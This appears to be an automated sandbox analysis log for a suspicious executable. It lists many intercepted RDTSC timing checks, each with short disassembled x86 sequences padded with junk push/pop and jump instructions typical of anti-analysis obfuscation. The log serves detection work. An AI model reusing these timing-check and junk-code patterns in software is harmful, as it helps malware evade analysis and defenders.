                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E05 second address: 999E0F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05F0F59496h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E0F second address: 999E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E1A second address: 999E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A0h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F05F0F59498h 0x00000013 push ebx 0x00000014 jmp 00007F05F0F594A0h 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E4C second address: 999E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49763h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999F96 second address: 999FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Eh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FAC second address: 999FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F05F0F49765h 0x0000000a jmp 00007F05F0F4975Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FD9 second address: 999FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F5949Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FF0 second address: 999FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FF4 second address: 999FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99A2E2 second address: 99A30D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jnl 00007F05F0F4975Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05F0F49764h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99F7F4 second address: 99F7FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99F7FE second address: 99F802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99F802 second address: 99F806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9A83A3 second address: 9A83A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9A83A9 second address: 9A83D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d popad 0x0000000e jc 00007F05F0F594BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF32D second address: 9BF33C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05F0F49756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF33C second address: 9BF35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF03E second address: 9BF048 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F05F0F4975Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF048 second address: 9BF062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F05F0F594A4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D55DC second address: 9D55E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5722 second address: 9D573A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A3h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E1D second address: 9D5E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E21 second address: 9D5E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E25 second address: 9D5E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F05F0F49769h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E46 second address: 9D5E6C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F594B1h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA68B second address: 9DA6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA6AE second address: 9DA6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA6B2 second address: 9DA6FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F05F0F4975Ch 0x0000000f popad 0x00000010 nop 0x00000011 jnp 00007F05F0F4975Ch 0x00000017 push 00000004h 0x00000019 mov dh, 8Ch 0x0000001b push 60AD4BB4h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jbe 00007F05F0F49756h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA6FB second address: 9DA700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA949 second address: 9DA9A8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F49758h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dx, si 0x0000000e mov dx, si 0x00000011 push dword ptr [ebp+122D37A8h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F05F0F49758h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 clc 0x00000032 call 00007F05F0F49759h 0x00000037 pushad 0x00000038 ja 00007F05F0F49763h 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007F05F0F49756h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA9A8 second address: 9DA9AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA9AC second address: 9DA9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F05F0F4975Eh 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA9BD second address: 9DA9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 ja 00007F05F0F594AFh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jc 00007F05F0F594A0h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA76 second address: 9DDA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F05F0F49756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA80 second address: 9DDA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA86 second address: 9DDA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA8C second address: 9DDA96 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05F0F5949Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA96 second address: 9DDAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDAA5 second address: 9DDAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDAA9 second address: 9DDAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DD629 second address: 9DD62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DD62D second address: 9DD631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DD631 second address: 9DD64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DF65F second address: 9DF67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F05F0F49764h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DF67B second address: 9DF685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05F0F59496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DF685 second address: 9DF696 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05F0F49756h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4DAC second address: 8F4DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4DB2 second address: 8F4DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4DB7 second address: 8F4DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4DBD second address: 8F4DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4DC1 second address: 8F4DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4DC5 second address: 8F4DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F05F0F49768h 0x00000011 jmp 00007F05F0F4975Fh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51003C8 second address: 51003FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F05F0F594A8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51003FC second address: 5100402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120654 second address: 512068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05F0F594A6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05F0F5949Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 512068F second address: 5120695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120695 second address: 51206D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F05F0F5949Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F05F0F594A7h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51206D2 second address: 51206D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51206D8 second address: 5120745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007F05F0F5949Ah 0x0000000f pushfd 0x00000010 jmp 00007F05F0F594A2h 0x00000015 add esi, 2D4F9068h 0x0000001b jmp 00007F05F0F5949Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], ecx 0x00000025 jmp 00007F05F0F594A6h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c jmp 00007F05F0F5949Eh 0x00000031 mov dl, cl 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120745 second address: 5120749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120749 second address: 512074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 512074F second address: 51207A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 71h 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F05F0F4975Eh 0x00000014 jmp 00007F05F0F49765h 0x00000019 popfd 0x0000001a mov esi, 678163F7h 0x0000001f popad 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F05F0F49764h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51207A2 second address: 51207C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d mov dx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ebx, esi 0x00000017 mov bx, cx 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51207C3 second address: 51207F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05F0F49760h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51207F3 second address: 51207F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51207F7 second address: 51207FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51207FD second address: 5120844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push dword ptr [ebp+08h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F05F0F594A7h 0x00000012 sub esi, 2F18D9FEh 0x00000018 jmp 00007F05F0F594A9h 0x0000001d popfd 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120844 second address: 512084B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120873 second address: 5120877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120877 second address: 512087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 512087D second address: 51208C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F05F0F594A0h 0x00000012 mov esi, eax 0x00000014 jmp 00007F05F0F594A0h 0x00000019 je 00007F05F0F594E7h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51208C6 second address: 51208CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51208CA second address: 51208CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51208F4 second address: 51208FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51208FA second address: 5120922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F05F0F5949Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120922 second address: 5120926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120926 second address: 512092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 512092C second address: 5120958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05F0F49767h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120958 second address: 512095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 512095E second address: 5120962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120962 second address: 511000F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c mov ebx, ecx 0x0000000e popad 0x0000000f retn 0004h 0x00000012 nop 0x00000013 cmp eax, 00000000h 0x00000016 setne al 0x00000019 jmp 00007F05F0F59492h 0x0000001b xor ebx, ebx 0x0000001d test al, 01h 0x0000001f jne 00007F05F0F59497h 0x00000021 sub esp, 04h 0x00000024 mov dword ptr [esp], 0000000Dh 0x0000002b call 00007F05F5946A8Bh 0x00000030 mov edi, edi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F05F0F5949Bh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 511000F second address: 5110014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110014 second address: 5110034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05F0F594A3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110034 second address: 5110084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05F0F4975Fh 0x00000009 xor al, 0000000Eh 0x0000000c jmp 00007F05F0F49769h 0x00000011 popfd 0x00000012 mov bl, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F05F0F49766h 0x00000021 rdtsc
